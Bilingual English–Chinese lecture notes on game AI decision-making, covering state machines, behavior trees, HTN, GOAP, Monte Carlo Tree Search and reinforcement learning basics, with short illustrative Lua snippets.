    • The change from one state to another is called a Transition

      从一个状态到另一个状态的改变称为转换

    webp

    webp

    A classic game AI example: Pac-Man.
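
    A minimal table-driven FSM in Lua, loosely based on the ghost example (the state and event names are hypothetical):

    -- transition table: transitions[state][event] = next state
    local transitions = {
        chase  = { power_pellet_eaten = "flee",  player_lost    = "wander" },
        flee   = { power_expired      = "chase" },
        wander = { player_spotted     = "chase" },
    }

    local fsm = { state = "wander" }

    function fsm:on_event(event)
        -- a Transition: look up (state, event) and switch states if defined
        local next_state = transitions[self.state][event]
        if next_state then self.state = next_state end
    end

    fsm:on_event("player_spotted")   -- wander -> chase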

    Finite State Machine - Pros & Cons

    ​有限状态机 - 优点和缺点

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Easy to understand

      易于理解

    • Very fast to deal with simple case

      处理简单情况非常快

    Cons:

    ​缺点:

    • Maintainability is bad, especially when adding or removing states

      可维护性差,尤其是添加或删除状态

    • Reusability is bad, can’t be reused in other projects or characters

      可重用性差,不能用于其他项目或角色

    • Scalability is bad, hard to modify for complicated cases

      可扩展性差,复杂情况下难以修改

    webp

    Hierarchical Finite State Machine (HFSM)

    ​分层有限状态机 (HFSM)

    Tradeoff between reactivity and modularity

    ​反应性和模块化之间的权衡

    • Reactivity: the ability to quickly and efficiently react to changes

      反应性:快速高效地对变化做出反应的能力

    • Modularity: the degree to which a system’s components may be separated into building blocks, and recombined

      模块化:系统组件可分离成构建块并重新组合的程度

    webp

    Behavior Tree (BT)

    Behavior Tree

    Focus on state abstraction and transition conditions

    ​关注状态抽象和转换条件

    webp

    Similar to human thinking:

    ​类似于人类的思维:

    • If ghost close, run away

      如果鬼靠近,就逃跑

    • But if I’m powerful, chase it

      但如果我很强大,就去追它

    • Otherwise, eating

      否则,就吃

    webp

    Behavior Tree - Execution Nodes

    ​行为树 - 执行节点

    Execution node (leaf node)

    ​执行节点(叶节点)

    • Condition node

      条件节点

    • Action node

      动作节点

    webp

    Behavior Tree - Control Nodes

    ​行为树-控制节点

    Control flow node (internal node)

    ​控制流节点(内部节点)

    • Control flow determined by the return value of child nodes

      控制流由子节点的返回值决定

    • Each node has a return value, which is success, failure or running

      每个节点都有一个返回值,即成功、失败或正在运行

    webp

    Control Node-Sequence (1/2)

    ​控制节点 - 序列 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Failure or Running then return value accordingly

        直到一个子节点返回失败或正在运行,然后相应地返回值

      • or all children return Success, then return Success

        或所有子节点都返回成功,然后返回成功

    • If Stop and Return Running

      如果停止并返回正在运行

      • the next execution will start from the running action

        下一次执行将从正在运行的操作开始

    webp

    Control Node-Sequence (2/2)

    Sequence

    ​序列

    • Allows designers to make a “plan”

      允许设计师制定“计划”

    webp

    Control Node-Selector (1/2)

    ​控制节点选择器 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Success or Running, then return value accordingly

        直到一个子节点返回 Success 或 Running,然后相应地返回值

      • or all children return Failure, then return Failure

        或所有子节点都返回 Failure,然后返回 Failure

    • If Stop and Return Running, the next execution will start from the running action

      如果 Stop 并 Return Running,则下一次执行将从 running 操作开始

    webp

    Control Node-Selector (2/2)

    ​控制节点选择器 (2/2)

    Selector

    ​选择器

    • Could select one action to do response to different environment

      可以选择一个动作来响应不同的环境

    • Could do the right thing according to priority

      可以根据优先级做正确的事情

    webp

    Control Node- Parallel (1/2)

    ​控制节点 - 并行 (1/2)

    • Order

      顺序

      • Logically execute all children simultaneously

        逻辑上同时执行所有子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • Return Success when at least M child nodes (between 1 and N) have succeeded

        当至少 M 个子节点(介于 1 和 N 之间)成功时返回成功

      • Return Failure when at least N - M + 1 child nodes (between 1 and N) have failed

        当至少 N - M + 1 个子节点(介于 1 和 N 之间)失败时返回失败

      • Otherwise return Running

        否则返回正在运行

    • If Stop and Return Running

      如果停止并返回正在运行

    • the next execution will start from the running actions

      下一次执行将从正在运行的操作开始

    webp

    Control Node - Parallel (2/2)

    ​控制节点 - 并行 (2/2)

    Parallel

    ​并行

    • Could do multiple things “at the same time”

      可以同时做多件事

    webp

    Behavior Tree

    ​行为树

    Execution nodes

    ​执行节点

    • Action

      操作

    • Condition

      条件

    Control flow nodes

    ​控制流节点

    • Sequence

      序列

    • Selector

      选择器

    • Parallel

      并行

    Node Type | Symbol | Succeeds | Fails | Running
    Sequence | webp | If all children succeed | If one child fails | If one child returns Running
    Selector | webp | If one child succeeds | If all children fail | If one child returns Running
    Parallel | webp | If ≥ M children succeed | If > N - M children fail | Otherwise
    Condition | webp | Upon completion | If impossible to complete | During completion
    Action | webp | If true | If false | Never
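
    A minimal Lua sketch of the Sequence and Selector rules from the table above (each child is a function returning "success", "failure" or "running"):

    function tick_sequence(children)
        for _, child in ipairs(children) do
            local status = child()
            if status ~= "success" then
                return status        -- stop on the first Failure or Running
            end
        end
        return "success"             -- all children succeeded
    end

    function tick_selector(children)
        for _, child in ipairs(children) do
            local status = child()
            if status ~= "failure" then
                return status        -- stop on the first Success or Running
            end
        end
        return "failure"             -- all children failed
    end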

    Tick a Behavior Tree

    ​Tick 行为树

    • The tick of a BT is like thinking

      BT 的 tick 就像思考

    • Every tick starts from the root node

      每次 tick 都从根节点开始

    • Go through different nodes from up to down, left to right

      从上到下、从左到右遍历不同的节点

    • Each node must return failure, success or running

      每个节点必须返回失败、成功或正在运行

    webp

    Behavior Tree-Decorator (1/2)

    ​行为树装饰器 (1/2)

    Decorator

    ​装饰器

    • A special kind of control node with a single child node

      一种特殊的控制节点,只有一个子节点

    • Usually some behavior pattern which is commonly used

      通常是一些常用的行为模式

    webp

    • For example, some common policies:
      • Loop execution
      • Execute once
      • Timer
      • Time Limiter
      • Value Modifier
      • Etc.

    Behavior Tree - Decorator (2/2)

    ​行为树 - 装饰器 (2/2)

    Decorator

    ​装饰器

    • Example: Use timer to implement “patrol”

      示例:使用计时器实现“巡逻”

    webp

    Behavior Tree-Precondition

    ​行为树-前提条件

    Simplify behavior tree structure with preconditions

    ​使用前提条件简化行为树结构

    webp

    Behavior Tree-Blackboard

    ​行为树-黑板

    Blackboard: the memory of behavior tree

    ​黑板:行为树的记忆

    webp

    Behavior Tree - Pros

    ​行为树 - 优点

    • Modular, Hierarchical organization

      模块化、分层组织

      • each subtree of a BT can be seen as a module, with a standard interface given by the return statuses

        BT 的每个子树都可以看作一个模块,具有由返回状态给出的标准接口

    • Human readable

      人类可读

    • Easy to maintain

      易于维护

      • Modification only affect parts of tree

        修改仅影响树的部分

    webp

    • Reactivity

      反应性

      • Think every tick to quickly change behavior according to environment

        每次 tick 都进行思考,根据环境快速改变行为

    • Easy to Debug

      易于调试

      • Every tick is a whole decision making process, so that it is easy to debug

        每次 tick 都是一个完整的决策过程,因此易于调试

    webp

    Behavior Tree - Cons

    ​行为树 - 缺点

    Cons

    ​缺点

    • Each tick starts from the root node, which costs much more

      每次 tick 都从根节点开始,开销更大

    • The more reactive, the more conditions to be checked and the more cost per tick

      反应性越高,需要检查的条件就越多,每次 tick 的成本就越高

    Upcoming: AI Planning and Goals

    ​即将推出:人工智能规划和目标

    To make the AI more deliberative, game designers introduced the AI Planning technique to improve the planning ability of AI

    ​为了让人工智能更具深思熟虑,游戏设计师引入了人工智能规划技术来提高人工智能的规划能力

    AI Planning:

    ​人工智能规划:

    • Manage a set of actions

      管理一组动作

    • A planner makes a plan according to the initial world state

      规划者根据初始世界状态制定计划

    webp

    Reference

    Steering & Sensing

    Crowd Simulation

    Classical Decision Making Algorithms

    Lecture 17: Game Engine Gameplay Systems - Advanced AI

    Advanced Artificial Intelligence

    ​高级 AI

    • Hierarchical Task Network

      分层任务网络

    • Goal-Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Machine Learning Basic

      机器学习基础

    • Build Advanced Game AI

      构建高级游戏人工智能

    Hierarchical Task Network

    ​层次任务网络

    Overview

    HTN assumes there are many hierarchical tasks

    ​HTN 假设存在许多分层任务

    webp

    Make a Plan like Human

    ​像人类一样制定计划

    Hierarchical:

    ​分层:

    • People in the real world usually make their plans hierarchically

      现实世界中的人们通常分层制定计划

    webp

    The methods I might need in order to complete “Take a class”.

    HTN Framework (1/2)

    ​HTN 框架

    World state

    ​世界状态

    • Contains a bunch of properties

      包含一系列属性

    • Input to planner, reflect the status of world

      输入到规划器,反映世界的状态

    • It’s a subjective world view in the AI's brain

      它是人工智能大脑中的主体世界观

    Sensors

    ​传感器

    • Perceive changes of environment and modify world state

      感知环境变化并修改世界状态

    • It’s more like Perception

      它更像是感知

    webp

    HTN Framework (2/2)

    HTN Domain

    ​HTN 域

    • Load from asset

      从资产加载

    • Describe the relationship of hierarchical tasks

      描述分层任务的关系

    Planner

    ​规划器

    • Make a plan from World State and HTN Domain

      根据世界状态和 HTN 域制定计划

    Plan Runner

    ​计划运行器

    • Running the plan

      运行计划

    • Update the world state after the task

      任务完成后更新世界状态

    webp

    HTN Task Types

    ​HTN 任务类型

    Two types of Tasks

    ​两种类型的任务

    • Primitive Task

      原始任务

    • Compound Task

      复合任务

    webp

    Primitive Task (1/2)

    ​原始任务 (1/2)

    • Preconditions

      前提条件

      • Determine whether an action could be executed

        确定是否可以执行某个操作

      • Check whether properties of game world being satisfied

        检查游戏世界的属性是否得到满足

    • Action

      操作

      • Determine what action the primitive task executes

        确定原始任务执行什么操作

    • Effects

      效果

      • Describe how the primitive task modify the game world state properties

        描述原始任务如何修改游戏世界状态属性

    webp

    webp

    • Precondition: have an antidote
    • Action: use the antidote
    • Effect: remove the debuff, consume the antidote
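
    A minimal Lua sketch of this primitive task (the field names and the world-state layout are hypothetical):

    local use_antidote = {
        preconditions = function(world_state)
            return world_state.antidote_count > 0       -- have an antidote
        end,
        action = function(agent)
            agent:use_item("antidote")                  -- what the task executes
        end,
        effects = function(world_state)
            world_state.poisoned = false                -- remove the debuff
            world_state.antidote_count = world_state.antidote_count - 1
        end,
    }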

    Compound Task (1/2)

    ​复合任务 (1/2)

    Compound Tasks

    ​复合任务

    • Contain several methods

      包含多种方法

    • Methods have different priority

      方法具有不同的优先级

    • Each method has preconditions

      每种方法都有先决条件

    Method

    ​方法

    • Contains a chain of sub-tasks

      包含一系列子任务

    • Sub-task could be a primitive task or a compound task

      子任务可以是原始任务或复合任务

    webp

    webp

    The detoxification task:

    • With enough materials, craft an antidote
    • With enough money, buy an antidote
    • Finally, use the antidote to cure the poison

    HTN Domain

    webp

    webp

    Planning

    Step 1

    • Start from the root task

      从根任务开始

    • Choose the method satisfying the precondition in order

      按顺序选择满足前提条件的方法

    webp

    Step 2

    • Decompose the method to tasks

      将方法分解为任务

    • Check precondition in order

      按顺序检查前提条件

    • Decompose the task if it is a compound task

      如果任务是复合任务,则将其分解

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • Assume all actions will succeed, and update the “world state” in temporary memory

      假设所有操作都会成功,在临时内存中更新“世界状态”

    • The world state has a duplicated copy used as scratch paper during the planning phase

      在规划阶段,世界状态有一份用作草稿纸的副本

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • go back and select a new method if precondition is not satisfied

      如果先决条件不满足,则返回并选择新方法

    webp

    Step 2 (For compound task)

    ​第 2 步(针对复合任务)

    • select the next method if precondition is not satisfied

      如果先决条件不满足,则选择下一个方法

    webp

    Step 3

    • Repeat step 2 until no more task needs to be done

      重复步骤 2,直到不再需要完成任务

    • The final plan contains only primitive tasks

      最终计划仅包含原始任务

    webp

    webp

    Run plan

    ​运行计划

    • Execute tasks in order

      按顺序执行任务

    • Stop until all tasks succeed, or one task failed

      停止直到所有任务成功,或一个任务失败

    Execute task

    ​执行任务

    • Check precondition and return failure if not satisfied

      检查先决条件,如果不满足则返回失败

    • Execute action

      执行操作

      • if succeed -> update world state and return success

        如果成功 -> 更新世界状态并返回成功

      • if failed -> return failure

        如果失败 -> 返回失败

    webp

    Replan

    ​重新规划

    There are three situations in which the agent starts planning

    ​代理可以在三种情况下启动计划

    • Not have a plan

      没有计划

    • The current plan is finished or failed

      当前计划已完成或失败

    • The World State changes via its sensor

      世界状态通过其传感器发生变化

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • HTN is similar to BT, but more high-level

      HTN 与 BT 类似,但更高级

    • It outputs a plan which has long-term effect

      它输出具有长期效果的计划

    • It would be faster compared to the BT in the same case

      在相同情况下,它比 BT 更快

    Cons:

    ​缺点:

    • Players’ behavior is unpredictable, so tasks may easily fail

      玩家行为不可预测,因此任务可能很容易失败

    • The World state and the effect of tasks are challenging for designers

      世界状态和任务效果对设计师来说具有挑战性

    Goal-Oriented Action Planning

    ​以目标为导向的行动计划

    Goal-Oriented Action Planning (GOAP)

    ​目标导向行动计划 (GOAP)

    • GOAP is more automated

      GOAP 更加自动化

    • It takes backward planning rather than forward

      它需要向后规划,而不是向前规划

    webp

    Structure

    ​结构

    Sensors and World State

    ​传感器和世界状态

    • Similar to HTN

      类似于 HTN

    Goal set

    ​目标集

    • All available goals

      所有可用目标

    Action set

    ​行动集

    • All available actions

      所有可用行动

    Planning

    ​规划

    • Output sequence of actions

      输出行动序列

    webp

    Goal Set

    ​目标集

    • Precondition decides which goal will be selected

      前提条件决定选择哪个目标

    • Priority decides which goal should be selected among all the possible goals

      优先级决定在所有可能的目标中选择哪个目标

    • Each goal can be presented as a Collection of States

      每个目标都可以表示为状态集合

    webp

    Goal Selection

    ​目标选择

    webp

    Action Set

    ​动作集

    Action in GOAP is with precondition, effect and cost

    ​GOAP 中的动作具有前提条件、效果和成本

    • Precondition: in which state, character can do this action

      前提条件:角色在哪种状态下可以执行此动作

    • Effect: after the action is done, how the world state changes

      效果:执行动作后,世界状态如何变化

    • Cost: defined by the developer, used as a weight to make the plan with the lowest cost

      成本:由开发人员定义,用作制定成本最低的计划的权重

    webp

    Backward Planning Like a Human

    ​像人类一样进行反向规划

    • When making a plan, start from goal state

      制定计划时,从目标状态开始

    webp

    Goal: cure the poison

    Backward plan: use the antidote ← buy the antidote with money ← visit the shop and pay

    Planning

    ​规划

    Step 1

    • Check goals according to priority

      根据优先级检查目标

    • Find the first goal of which precondition is satisfied

      找到第一个满足先决条件的目标

    webp

    Step 2

    • Compare the target state with world state to find unsatisfied goal

      将目标状态与世界状态进行比较,找出未满足的目标

    • Set all unsatisfied states of the goal into a stack

      将目标的所有未满足状态放入堆栈中

    webp

    Step 3

    • Check the top unsatisfied state from the stack

      从堆栈中检查顶部未满足的状态

    • Select an action from action set which could satisfy the chosen state

      从操作集中选择一个可以满足所选状态的操作

    • Pop the state if it is satisfied by the selected action

      如果所选操作满足该状态,则弹出该状态

    webp

    Step 4

    • Push action to plan stack

      将操作推送到计划堆栈

    • Check precondition of corresponded action

      检查相应操作的前提条件

    • If precondition is not satisfied, push state to stack of unsatisfied states

      如果前提条件不满足,则将状态推送到不满足状态堆栈

    webp
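
    Putting steps 2-4 together, here is a minimal Lua sketch of the backward pass (greedy, without the cost search described next; `find_action_satisfying` is an assumed helper and states are boolean flags in `world_state`):

    function goap_plan(goal_states, world_state, actions)
        local unsatisfied, plan = {}, {}
        for _, s in ipairs(goal_states) do
            if not world_state[s] then table.insert(unsatisfied, s) end
        end
        while #unsatisfied > 0 do
            local state = table.remove(unsatisfied)          -- pop top of stack
            local action = find_action_satisfying(actions, state)
            if not action then return nil end                -- planning failed
            table.insert(plan, 1, action)                    -- backward: prepend
            -- push the action's unsatisfied preconditions onto the stack
            for _, pre in ipairs(action.preconditions) do
                if not world_state[pre] then table.insert(unsatisfied, pre) end
            end
        end
        return plan                                          -- execution order
    end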

    Build States-Action-Cost Graph

    ​构建状态-动作-成本图

    Can be turned into a path planning problem

    ​可以转化为路径规划问题(动态规划)

    • Node: combination of states

      节点:状态组合

    • Edge: Action

      边:动作

    • Distance: Cost

      距离:成本

    Search direction

    ​搜索方向

    • Start node: states of the goal

      起始节点:目标状态

    • End node: current states

      结束节点:当前状态

    webp

    Given the goal of curing the poison, find the lowest-cost route from the current state.

    The Lowest Cost Path

    ​最低成本路径

    Can use A* or other shortest path algorithms

    ​可以使用 A* 或其他最短路径算法

    • Heuristics can be represented with number of unsatisfied states

      启发式算法可以用不满足状态的数量来表示

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • Compared with HTN, GOAP planning is more dynamic

      与 HTN 相比,GOAP 计划更具动态性

    • Decoupling goals and behaviors

      将目标和行为分离

    • HTN can easily make precondition/effect mismatching mistakes

      HTN 很容易犯前提条件 / 效果不匹配的错误

    Cons:

    ​缺点:

    • In a single AI system, the runtime planning would be slower than BT/FSM/HTN

      在单个 AI 系统中,运行时规划会比 BT/FSM/HTN 慢

    • Also needs a well-represented world state and action effect

      还需要一个具有良好表现的世界状态和行动效果

    ​蒙特卡洛树搜索

    Monte Carlo Tree Search

    MCTS is another automated planning technique, and it behaves more diversely

    ​MCTS 是另一种自动化规划,其行为更加多样化

    webp

    AlphaGo used Monte Carlo Tree Search.

    webp

    Like playing chess, simulate millions of possible moves in mind and choose the “best” step

    ​就像下棋一样,在脑海中模拟数百万种可能的走法,并选择“最佳”一步

    Monte Carlo Method

    ​蒙特卡洛方法

    • A broad class of computational algorithms that rely on repeated random sampling to obtain numerical results

      一大类依赖重复随机抽样来获得数值结果的计算算法

    webp

    Monte Carlo Tree Search

    webp

    For the current board state, enumerate the plausible moves and find the best move.

    States and Actions

    ​状态和动作

    State

    ​状态

    • The state of game

      游戏状态

    • Represented by a node

      用节点表示

    webp

    Action

    ​动作

    • A one-step operation of the AI

      人工智能的一步操作

    • Represented by an edge

      用边表示

    webp

    State Transfer

    Transfer the state from A to B by an action

    webp

    State Space

    ​状态空间

    A Tree Structured State space:

    ​树结构状态空间:

    The set of states that can be reached from the current state after a possible sequence of actions

    ​从当前状态经过一系列可能的操作后可以到达的状态集

    webp

    NOTICE: Rebuild the State Space for Each Move

    ​注意:每次移动都要重建状态空间

    webp

    Simulation: Playing a Game in Mind Quickly

    ​模拟:快速在脑海中玩游戏

    Simulation

    ​模拟

    • Run from the state node according to the Default Policy to produce an outcome

      根据默认策略从状态节点运行以产生结果

    In the case of Go

    ​围棋的情况

    • Apply random moves from the state until the game is over

      从状态中应用随机动作直到游戏结束

    • Return 1 (win) or 0 (loss) depending on the result

      根据结果返回 1(赢)或 0(输)

    Default Policy

    ​默认策略

    • A meaningful but quick rule or neural network to play the game

      一个有意义但快速的规则或神经网络来玩游戏

    webp

    How to evaluate the states?

    ​如何评估状态?

    Evaluation Factors

    ​评估因素

    • Q: Accumulation of Simulation Results

      Q:模拟结果的累积

    • N: Number of simulations

      N:模拟次数

    Simulation results and the number of simulations may come not from direct simulation but from child nodes

    ​模拟结果和模拟次数可能不是直接模拟,而是来自子节点

    webp

    Backpropagate

    ​反向传播

    Propagate influence of child state back parent state

    ​将子状态的影响传播回父状态

    • $Q_{FatherNode}=Q_{FatherNode}+Q_{ChildNode}$

    • $N_{node}=N_{node}+1$

    • Repeat it until reaching the root

      重复此操作直至到达根节点
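
    A minimal Lua sketch of these two update rules (the node fields `Q`, `N` and `parent` are assumed):

    function backpropagate(node, outcome)
        while node do
            node.Q = node.Q + outcome   -- accumulate the simulation result
            node.N = node.N + 1         -- one more simulation passed through
            node = node.parent          -- repeat until reaching the root
        end
    end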

    webp

    Iteration Steps

    ​迭代步骤

    • Selection: select the most urgent “expandable” node

      选择:选择最紧急的“可扩展”节点

    • Expansion: expand the tree by selecting an action

      扩展:通过选择操作扩展树

    • Simulation: simulate from the new node and produce an outcome

      模拟:从新节点进行模拟并产生结果

    • Backpropagate: backpropagate the outcome of simulation from the new node

      反向传播:从新节点反向传播模拟结果

    webp

    Search in “Infinite” State Space

    ​在“无限”状态空间中搜索

    Generally impossible to traverse the state space

    ​通常不可能遍历状态空间

    • We prioritize exploring the most promising regions in state space

      我们优先探索状态空间中最有希望的区域

    • Pre-set a computational budget and stop exploring the state space when the budget is reached

      预设计算预算,并在达到预算时停止探索状态空间

    Selection-Expandable Node

    ​选择可扩展节点

    Select the most urgent “expandable” node

    ​选择最紧急的“可扩展”节点

    “expandable" node

    ​“可扩展”节点

    • Nonterminal state and has unvisited children

      非终止状态且有未访问的子节点

    • Example:

      示例:

    webp

    Selection-Exploitation and Exploration

    ​选择-开发和探索

    Exploitation

    ​开发

    • Look in areas which appear to be promising

      寻找看似有希望的领域

    • Select the child which has high Q/N value

      选择具有高 Q/N 值的子项

    webp

    Exploration

    ​探索

    • Look in areas that have not been well sampled yet

      查看尚未充分采样的区域

    • Select the child which has low number of visits

      选择访问次数较少的子项

    webp

    webp

    UCB (Upper Confidence Bounds)

    ​UCB(置信上限)

    How to balance exploration and exploitation?

    ​如何平衡探索和开发?

    • Use UCB (Upper Confidence Bounds) formula

      使用 UCB(置信上限)公式

    • $UCB_j$ :the UCB value of the node $j$

      $UCB_j$:节点 $j$ 的 UCB 值

    • $Q_j$: the total reward of all playouts that passed through node $j$

      $Q_j$:经过节点 $j$ 的所有播放的总奖励

    • $N_j$ : the number of times node $j$ has been visited

      $N_j$:节点 $j$ 被访问的次数

    • $N$ : the number of times the parent node of node $j$ has been visited

      $N$:节点 $j$ 的父节点被访问的次数

    • $C$: a constant, adjusted to lower or increase the amount of exploration performed

      $C$:一个常数,调整以降低或增加探索执行量
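
    The formula itself only survives as an image here; reconstructed from the definitions above (and mirroring the LCB formula given later with the sign flipped), it should be:

    $$UCB_j=\frac{Q_j}{N_j}+C\cdot\sqrt{\frac{2\ln(N)}{N_j}}$$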

    webp

    Selection

    ​选择

    How to select the most urgent expandable node

    ​如何选择最紧急的可扩展节点

    • Always Search from the root node

      始终从根节点搜索

    • Find the highest UCB value child node (promising child) of current node

      查找当前节点的 UCB 值最高的子节点(有希望的子节点)

    • Set promising child as current node

      将有希望的子节点设置为当前节点

    • Iterate above steps until current node is expandable. Set current node as selected node

      迭代上述步骤,直到当前节点可扩展。将当前节点设置为选定节点

    webp

    Expansion

    ​扩展

    Expansion

    ​扩展

    • One or more new child nodes are added to selected node, according to the available actions

      根据可用操作,向选定节点添加一个或多个新子节点

    • The value of child node is unknown

      子节点的值未知

    webp

    Simulation and Backpropagation

    ​模拟和反向传播

    webp

    The End Condition

    ​结束条件

    Computational budget

    ​计算预算

    • Memory size (the number of nodes)

      内存大小(节点数)

    • Computation time

      计算时间

    webp

    How to Choose the Best Move?

    ​如何选择最佳移动?

    The “best” child node of current state node

    ​当前状态节点的“最佳”子节点

    • Max child: Select the root child with the highest Q-value

      最大子节点:选择具有最高 Q 值的根子节点

    • Robust child: Select the most visited root child

      稳健子节点:选择访问次数最多的根子节点

    • Max-Robust child: Select the root child with both the highest visit count and the highest reward. If none exists, then continue searching until an acceptable visit count is achieved

      最大稳健子节点:选择访问次数和奖励都最高的根子节点。如果不存在,则继续搜索,直到达到可接受的访问次数。

    • Secure child: Select the child which maximises a lower confidence bound (LCB)

      安全子节点:选择最大化下置信区间 (LCB) 的子节点

    $$LCB_{j}=\frac{Q_j}{N_j}-C\cdot\sqrt{\frac{2\ln(N)}{N_j}}$$

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • The MCTS agent behaves diversely

      MCTS 代理行为多样

    • Agent makes the decision totally by itself

      代理完全自行做出决策

    • Can solve the problem of large search space

      可以解决搜索空间大的问题

    Cons:

    ​缺点:

    • The action and state are hard to design for most real-time games

      对于大多数实时游戏来说,动作和状态很难设计

    • It is hard to model for most real-time games

      对于大多数实时游戏来说,很难建模

    Machine Learning Basic

    ​机器学习基础

    Machine Learning

    ​机器学习

    Four Types of Machine Learning

    ​机器学习的四种类型

    • Supervised learning

      监督学习

    • Unsupervised learning

      无监督学习

    • Semi-supervised learning

      半监督学习

    • Reinforcement learning

      强化学习

    webp

    ML Types: Supervised Learning

    ​ML 类型:监督学习

    • Learn from labeled data

      训练时提供标记数据

    webp

    ML Types: Unsupervised Learning

    ​ML 类型:无监督学习

    • Learn from unlabeled data

      从未标记的数据中学习

    webp

    Unsupervised learning is well suited to clustering problems.

    ML Types: Semi-supervised Learning

    ​ML 类型:半监督学习

    • Learn from a lot of unlabeled data and very scarce labeled data

      从大量未标记数据和非常稀少的标记数据中学习

    webp

    ML Types: Reinforcement learning

    ​ML 类型:强化学习

    • Learn from an interaction process with environment

      从与环境的交互过程中学习

    webp

    Reinforcement Learning

    ​强化学习

    Reinforcement learning (RL) is an area of machine learning concerned with how intelligent agents ought to take actions in an environment in order to maximize the notion of cumulative reward.

    强化学习 (RL) 是机器学习的一个领域,它关注智能代理如何在环境中采取行动,以最大化累积奖励的概念。

    • Trial-and-error search

      反复试验

    • The learner must discover which actions yield the most reward by trying them

      学习者必须通过尝试发现哪些行动能产生最大的奖励

    • Delayed reward

      延迟奖励

    • Actions may affect the immediate reward, the next situation and all subsequent rewards

      行动可能会影响即时奖励、下一个情况和所有后续奖励

    Markov Decision Process-Basic Elements (1/4)

    ​马尔可夫决策过程 - 基本元素 (1/4)

    • Agent

      代理

      The learner and decision maker

      学习者和决策者

    • Environment

      环境

      The thing the agent interacts with, comprising everything outside the agent

      代理与之交互的事物,包括代理之外的一切

    webp

    Markov Decision Process-State (2/4)

    ​马尔可夫决策过程 - 状态 (2/4)

    State is the observation of the agent, and its data structure is designed by humans

    ​状态是代理的观察,数据结构由人设计

    webp

    Markov Decision Process-Action (3/4)

    ​马尔可夫决策过程-行动 (3/4)

    Action is the minimal element with which the agent can act in the game. It is also designed by humans

    ​行动是代理在游戏中可以表现的最小元素,它也是由人类设计的

    webp

    Markov Decision Process-Reward (4/4)

    ​马尔可夫决策过程-奖励 (4/4)

    A special signal the agent receives at each time step, passed from the environment to the agent

    ​代理在从环境传递到代理的每个时间步骤中收到的特殊信号

    webp

    MDP Mathematical Model

    ​MDP 数学模型

    • Probability of transition

      转换概率

      The probability of transition from s to s’ after taking action a

      采取行动 a 后从 s 转换到 s’ 的概率

    $$p(s’|s, a)=P(S_t=s’|S_{t-1}=s, A_{t-1}=a)$$

    • Policy

      策略

      A mapping from states to probabilities of selecting each possible action

      从状态到选择每个可能行动的概率的映射

    $$\pi(a|s)=P(A_t=a|S_t=s)$$

    • Total reward

      总奖励

      The cumulative reward it receives in the long run

      从长远来看,它获得的累积奖励

    $$G_t=R_{t+1}+R_{t+2}+R_{t+3}+…+R_T$$

    $$G_t=R_{t+1}+\gamma R_{t+2}+\gamma^2R_{t+3}+…$$

    webp

    Policy

    ​策略

    A mapping from states to probabilities of selecting each possible action

    ​从状态到选择每个可能动作的概率的映射

    $$\pi(a|s)=P(A=a|S=s)$$

    webp

    Build Advanced Game AI

    ​构建高级游戏 AI

    Why Game AI Needs Machine Learning

    ​为什么游戏 AI 需要机器学习

    It is notable that all previous methods actually need human knowledge to design (including the costs in GOAP)

    ​值得注意的是,之前的方法实际上都需要人类知识来设计(包括 GOAP 的成本)

    But players always expect AI to be able to both deal with a complicated game world and behave naturally and diversely

    ​但玩家总是希望 AI 能够既能应对复杂的游戏世界,又能表现得自然多样

    • Traditional methods is in limited space

      传统方法空间有限

    • Machine Learning create infinite possibilities

      机器学习创造无限可能

    webp

    Machine Learning Framework in Game

    ​游戏中的机器学习框架

    The framework for deploying a neural network to act as an agent

    ​部署神经网络扮演代理的框架

    Observation:

    ​观察:

    • The Game State the AI could observe

      人工智能可以观察到的游戏状态

      • Vector feature

        矢量特征

      • Unit information

        单位信息

      • Environment information

        环境信息

      • Etc.

    • Image

      图像

    webp

    DRL Example-Model the Game

    ​DRL 示例-游戏建模

    A DRL design process should contain:

    ​DRL 设计流程应包含:

    • State

      状态

    • Action

      动作

    • Reward

      奖励

    • NN design

      神经网络设计

    • Training Strategy

      训练策略

    webp

    DRL Example-State

    webp

    For the game shown above, state = minimap + game stats + units + player data.

    States (1/2)-Maps

    ​状态-地图

    Heights

    ​高度

    Visibility: fog of war

    ​可见性:战争迷雾

    Creep

    ​菌毯

    Entity owners

    ​实体所有者

    Alerts

    ​警报

    Pathable

    ​可行进

    Buildable

    ​可建造

    webp

    States(2/2)-Units Information

    ​状态(2/2)-单位信息

    For each unit in a frame

    ​对于每一帧中的每个单位

    ​Unit type 单位类型

    ​OwnerStatus 所有者状态

    ​Display type 显示类型

    ​Position 位置

    ​Number of workers 工人数量

    ​Cool down 冷却

    ​Attributes 属性

    ​Unit attributes 单位属性

    ​Cargo status 货物状态

    ​Building status 建筑状态

    ​Resource status 资源状态

    ​Order status 订单状态

    ​Buff status 增益状态

    webp

    Actions

    ​动作

    For a unit it should have actions like

    ​对于一个单位来说,它应该有以下动作

    • What

      什么

      • move

        移动

      • attack

        攻击

      • build

        建造

    • Who

      谁

    • Where

      哪里

    • When next action

      何时进行下一步行动

    webp

    Rewards (1/2)

    ​奖励(1/2)

    Direct reward from game

    ​游戏直接奖励

    • Win: +1

      赢:+1

    • Lose: -1

      输:-1

    Pseudo-reward output along with critic network:

    ​与评论网络一起输出的伪奖励:

    • the distance of agent’s operation and human data statistic z

      代理操作与人类数据统计的距离 z

    webp

    Rewards (2/2)

    ​奖励 (2/2)

    Reward is much denser in OpenAI Five for Dota 2

    ​Dota2 中 OpenAI Five 的奖励更加密集

    Different reward settings could help us to train different styles of agent

    ​不同的奖励设置可以帮助我们训练不同风格的代理

    • Aggressive

      激进

    • Conservative

      保守

    webp

    NN architectures

    webp

    The neural network architecture OpenAI used to play Dota 2.

    DRL example-Multi-Layer Perceptron (MLP)

    ​DRL 示例-多层感知器 (MLP)

    Classical and easy to implement

    ​经典且易于实现

    Flexible definition of the dimensions of inputs and outputs

    ​灵活定义输入和输出的维度

    webp

    Scalar feature example

    ​标量特征示例

    • Race

      种族

